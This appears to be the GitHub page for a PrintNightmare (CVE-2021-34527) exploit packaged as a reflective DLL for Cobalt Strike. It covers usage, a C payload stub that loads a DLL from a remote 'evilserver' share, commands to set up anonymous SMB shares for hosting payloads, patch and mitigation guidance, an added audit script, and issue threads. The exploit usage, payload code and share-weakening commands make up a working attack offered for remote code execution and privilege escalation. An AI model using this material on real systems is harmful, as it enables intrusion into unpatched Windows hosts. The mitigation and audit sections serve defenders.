PrintNightmare exploit

Overview

CVE-2021-1675 / CVE-2021-34527 exploit.

Reflective DLL implementation of the PrintNightmare PoC by Cornelis de Plaa (@Cneelis). The exploit was originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370).

  • It can be used as a Remote Code Execution (RCE) exploit (screenshot 1).
  • It can be used for Privilege Escalation (screenshot 2).

This implementation has some advantages compared to other public exploits:

  • It uses the MS-PAR protocol instead of MS-RPRN (credits @cube0x0).
  • It is in Reflective DLL form, so it can be used directly from Cobalt Strike or another C2 framework.
  • It automatically finds the path of the printer driver.

Usage

Within the Cobalt Strike Beacon console:

PrintNightmare [target ip or hostname] [UNC path to payload Dll] [optional domain] [optional username] [optional password]

The payload DLL is started by spoolsv.exe (the Print Spooler service) from DllMain, so it should avoid API calls that require loader synchronisation, which can otherwise deadlock. We recommend that the payload DLL only perform a CreateProcess call, something like this:

#include <windows.h>

// Runs from the payload DLL's DllMain while the loader lock is held:
// keep it to a single CreateProcess call and nothing that synchronises.
void NothingToSeeHere() {
	STARTUPINFO sui;
	PROCESS_INFORMATION pi;

	RtlZeroMemory(&sui, sizeof(sui));
	RtlZeroMemory(&pi, sizeof(pi));
	sui.cb = sizeof(sui);

	GetStartupInfo(&sui);
	LPCWSTR lpwApplicationName = L"C:\\Windows\\System32\\rundll32.exe";
	// CreateProcessW may write to the command-line buffer, so it has to be
	// writable; a string literal cast to LPWSTR lives in read-only memory.
	WCHAR wcCommandLine[] = L"C:\\Windows\\System32\\rundll32.exe \\\\evilserver\\thankyou\\c2payload.dll,MyExport";

	if (!CreateProcess(lpwApplicationName, wcCommandLine, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &sui, &pi)) {
		return;
	}

	// The child keeps running after its handles are closed.
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);
}

Screenshot 1: using this exploit for RCE

Screenshot 2: using this exploit for LPE

SMB server configuration

Source: https://github.com/cube0x0/CVE-2021-1675#smb-configuration

The easiest way to host payloads is to use Samba and modify /etc/samba/smb.conf to allow anonymous access:

[global]
     map to guest = Bad User
     server role = standalone server
     usershare allow guests = yes
     idmap config * : backend = tdb
     smb ports = 445
[smb]
     comment = Samba
     path = /tmp/
     guest ok = yes
     read only = no
     browsable = yes
     force user = smbuser

From Windows it's also possible:

mkdir C:\share
icacls C:\share\ /T /grant Anonymous logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot

Compile instructions

This project is written in C and assembly. You can use Visual Studio to compile it from source. We are not releasing binaries, so you will have to compile yourself.

Mitigation

In July 2021 Microsoft released an emergency update to fix the PrintNightmare vulnerability (CVE-2021-34527). Make sure you run Windows Update and install the update that matches your version:

  • Version 21H1, 20H1, 2004 – KB5004945 (Build 19043.1083).
  • Version 1909 – KB5004946 (Build 18363.1646).
  • Version 1809 and Windows Server 2019 – KB5004947 (Build 17763.2029).
  • Version 1803 – KB5004949.
  • Version 1507 – KB5004950.
  • Windows 8.1 and Windows Server 2012 – KB5004954 and KB5004958 (security only).
  • Windows 7 SP1 and Windows Server 2008 R2 SP1 – KB5004953 and KB5004951 (security only).
  • Windows Server 2008 SP2 – KB5004955 and KB5004959 (security only).

For more information, see Microsoft guidance:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

This patch also adds the ability to prevent non-administrators from installing any print drivers on a print server (including signed drivers) by configuring the “RestrictDriverInstallationToAdministrators” registry value. For information on this option, see:

https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7

Other options to mitigate the PrintNightmare vulnerability include:

  • Disable the Print Spooler service (on Domain Controllers and non-print servers).
  • Disable inbound remote printing through Group Policy.
  • Block inbound connectivity using a firewall.
  • Ensure Point and Print installation prompts are enabled.
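An added host audit for the mitigations listed in this section, written here and not part of the Outflank project. It assumes the policy value names documented in KB5005010 and the "Allow Print Spooler to accept client connections" policy (RestrictDriverInstallationToAdministrators, NoWarningNoElevationOnInstall, UpdatePromptSettings, RegisterSpoolerRemoteRpcEndPoint), and extends the README's 19043.1083 entry to builds 19041 and 19042 on the assumption that they share that UBR:

```powershell
# Added example, not part of the Outflank project: audits a host for the
# PrintNightmare mitigations listed above. Run from an elevated PowerShell.
function Test-PrintNightmareMitigations {
    $findings = @()

    # 1. Patch level. Minimum UBR per build from the July 2021 KBs listed above;
    #    19041/19042 are assumed to share the 1083 level given for 19043.
    $cv = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $build = [int]$cv.CurrentBuildNumber
    $ubr = [int]$cv.UBR
    $minUbr = @{ 19043 = 1083; 19042 = 1083; 19041 = 1083; 18363 = 1646; 17763 = 2029 }
    if ($minUbr.ContainsKey($build)) {
        if ($ubr -lt $minUbr[$build]) {
            $findings += "Build $build.$ubr is below the patched level $build.$($minUbr[$build])"
        }
    } else {
        $findings += "Build $build is not in the table; check the KB for this version manually"
    }

    # 2. Print Spooler service: should be stopped on DCs and non-print servers.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($spooler -and $spooler.Status -eq 'Running') {
        $findings += 'Print Spooler service is running'
    }

    # 3. Point and Print policy (value names assumed from KB5005010):
    #    driver installs restricted to admins, install/update prompts kept on.
    $pnp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $p = Get-ItemProperty -Path $pnp -ErrorAction SilentlyContinue
    if (-not $p -or $p.RestrictDriverInstallationToAdministrators -ne 1) {
        $findings += 'RestrictDriverInstallationToAdministrators is not set to 1'
    }
    if ($p -and $p.NoWarningNoElevationOnInstall -eq 1) {
        $findings += 'NoWarningNoElevationOnInstall = 1 (Point and Print prompts disabled)'
    }
    if ($p -and $p.UpdatePromptSettings -gt 0) {
        $findings += "UpdatePromptSettings = $($p.UpdatePromptSettings) (update prompts weakened)"
    }

    # 4. Inbound remote printing: the GPO "Allow Print Spooler to accept client
    #    connections" set to Disabled writes RegisterSpoolerRemoteRpcEndPoint = 2 (assumed).
    $pr = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers' -ErrorAction SilentlyContinue
    if (-not $pr -or $pr.RegisterSpoolerRemoteRpcEndPoint -ne 2) {
        $findings += 'Inbound remote printing is not disabled by policy'
    }
    return $findings
}

$result = @(Test-PrintNightmareMitigations)
if ($result.Count -eq 0) { 'No PrintNightmare exposure findings' } else { $result | ForEach-Object { "[!] $_" } }
```

A host that passes all four checks still needs the Spooler decision made per role; a print server keeps the service and relies on the patch plus the policy values.
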

Issues

  • PrintNightmare.dll crashes

    Hi!

    I keep getting heap corruption errors in my lab machine while trying to launch the exploit through Beacon. I think this might be a matter of compiling and therefore I've tried to compile the binary in both VS2022 and VS2019, trying both /MD and /MT runtime libraries. I'm not too familiar with debugging C programs so this is the best I can do for now.

    So, what's the specific setup needed to compile the binary?

    The error from Windows log:

    Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b
    Faulting module name: ntdll.dll, version: 10.0.19041.1466, time stamp: 0xe2f8ca76
    Exception code: 0xc0000374
    Fault offset: 0x00000000000ff199
    Faulting process ID: 0xecc
    Faulting application start time: 0x01d83786454eec85
    Faulting application path: C:\Windows\system32\rundll32.exe
    Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
    Report ID: 88cab659-788c-40e2-9047-4feaa5c7dd68
    Faulting package full name: 
    Faulting package-relative application ID: 
    
    opened by 65535a 0
  • Some minor hygiene issues on resource management

    These are more hygiene issues than actual bugs. Resource allocations will be freed at process exit anyway. But the code takes care to release resources and so just noting them. Code may be copy/pasted into other frameworks where resource hygiene may matter more.

    1. The call to CreateBindingHandle initializes bHandle. The CleanUp routine should call RpcBindingFree on this resource.

    Allocated here: https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare/PrintNightmare/PrintNightmare.c#L193 and here: https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare-rDll/PrintNightmare/ReflectiveDll.c#L298

    2. Should check for failed allocation before writing:

    	container_info.Level = 2;
    	container_info.DriverInfo.Level2 = (DRIVER_INFO_2*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(DRIVER_INFO_2));   /// check for failed allocation
    	container_info.DriverInfo.Level2->cVersion = 3;

    This is both in the reflective and non-reflective cases: https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare/PrintNightmare/PrintNightmare.c#L214

    https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare-rDll/PrintNightmare/ReflectiveDll.c#L305

    3. Should free memory from call to Utf8ToUtf16 in CleanUp

    https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare-rDll/PrintNightmare/ReflectiveDll.c#L245

    4. Code inconsistently switches from MAX_BUF to MAX_PATH

    LPWSTR GetDriverPath(IN LPWSTR lpwTarget) {
    ...
    	WCHAR wcKeyName[MAX_BUF] = { 0 };
    	DWORD dwNamelen = MAX_BUF;
    ...
    		if (lResult == 0) {
    			for (DWORD i = 0; ; i++) {
    				RtlZeroMemory(wcKeyName, sizeof(wcKeyName));
    				lResult = RegEnumKeyEx(hSubKeyHandle, i, wcKeyName, &dwNamelen, NULL, NULL, NULL, NULL);
    				if (StrStrIW(wcKeyName, L"ntprint.inf_amd64")) {
    					wcscpy_s(lpwDriverPath, MAX_BUF, L"C:\\Windows\\System32\\DriverStore\\FileRepository\\");
    					wcscat_s(lpwDriverPath, MAX_BUF, wcKeyName);
    					wcscat_s(lpwDriverPath, MAX_BUF, L"\\Amd64\\UNIDRV.DLL");
    					wprintf(L"[>] pDriverPath:  -> %s\n\n", lpwDriverPath);
    					break;
    				}
    
    				if (lResult == ERROR_NO_MORE_ITEMS) {
    					break;
    				}
    
    				dwNamelen = MAX_PATH;  //changed from MAX_BUF to MAX_PATH?
    			}
    		}
    	}
    

    https://github.com/outflanknl/PrintNightmare/blob/8975bbbf0bb367855842afc9fad80b87e334bfdb/SOURCE/PrintNightmare-rDll/PrintNightmare/ReflectiveDll.c#L167

    opened by JohnLaTwC 0
Owner: Outflank B.V.